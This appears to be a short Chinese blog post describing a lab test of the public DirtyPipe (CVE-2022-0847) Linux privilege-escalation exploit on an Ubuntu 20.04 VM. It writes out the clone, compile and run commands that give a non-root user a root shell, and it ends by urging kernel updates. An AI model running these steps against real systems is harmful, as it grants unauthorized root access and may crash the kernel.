利用 CVE-2022-0847 DirtyPipe 進行 Linux 提權


一起床就看到了好玩的東西,昨天 (3/7) Max Kellermann 揭露了一個 DirtyPipe 的漏洞 https://dirtypipe.cm4all.com/ 名字聽起來就跟 DirtyCow 很像,也是一個可以本地提權的漏洞,漏洞詳情可以看上方連結的研究。

網路上也馬上就出現了一大堆 Exploit 的腳本,這邊我拿 Arinerron 的來試玩了一下。

首先到 Ubuntu 官網下載了最新版的 20.04 VM。

steven@ubuntu:/tmp$ uname -a
Linux ubuntu 5.13.0-30-generic #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

安裝好後,新增一個沒有 root 權限的使用者做為測試。

sudo adduser testuser

下載並編譯腳本

cd /tmp
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
cd CVE-2022-0847-DirtyPipe-Exploit/
./compile.sh

當然如果 Victim 端沒有 gcc 的話,也可以在 attacker 機器上編譯好再傳過去。

接下來執行

./exploit

就順利的可以提權到 Root 了!

理論上這個漏洞跟髒牛牛一樣,有很大的機率會搞壞 Linux Kernel,最近真的好多有趣的提權方法呢,前陣子的 pwnkit 跟這次的 Dirtypipe,看樣子大家的 Linux 真的要記得常常更新 (但 Server 更新也很可怕就是了 QQ)。

,

發表迴響